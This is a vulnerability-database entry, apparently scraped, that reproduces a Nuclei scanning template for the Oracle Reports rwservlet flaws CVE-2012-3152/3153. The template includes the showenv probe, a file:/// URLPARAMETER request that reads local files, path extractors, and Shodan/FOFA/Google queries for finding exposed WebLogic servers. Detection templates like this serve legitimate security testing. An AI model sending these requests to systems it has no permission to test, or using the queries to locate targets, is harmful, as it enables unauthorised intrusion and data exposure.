CVE-2012-3153: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)

日期: 2025-08-01 | 影响软件: Oracle Forms & Reports | POC: 已公开

漏洞描述

An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component.

PoC代码[已公开]

id: CVE-2012-3153

info:
  name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
  author: Sid Ahmed MALAOUI @ Realistic Security
  severity: medium
  description: |
    An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
    11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
    vectors related to Report Server Component.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
  remediation: |
    Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-3152
    - https://www.exploit-db.com/exploits/31737
    - https://www.oracle.com/security-alerts/cpuoct2012.html
    - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
    - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
    cvss-score: 6.4
    cve-id: CVE-2012-3153
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.91205
    epss-percentile: 0.99625
    cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: fusion_middleware
    shodan-query:
      - http.title:"weblogic"
      - http.html:"weblogic application server"
    fofa-query:
      - title="weblogic"
      - body="weblogic application server"
    google-query: intitle:"weblogic"
  tags: cve,cve2012,oracle,rce,edb,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/reports/rwservlet/showenv"
      - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "Reports Servlet")'

      - type: dsl
        dsl:
          - '!contains(body_2, "<html")'
          - '!contains(body_2, "<HTML")'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: windows_working_path
        regex:
          - ".?.?\\\\.*\\\\showenv"

      - type: regex
        name: linux_working_path
        regex:
          - "/.*/showenv"
# digest: 4a0a00473045022100f311b2d8f1c07223faa80de8d0e33c7efc9fb8120ca0651ff7d0c7b8472b46fc022008a38c2d26e1be63c3417f958112bfe8267173abcd7cd7be89b686e31de8e2d1:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2012/CVE-2012-3153.yaml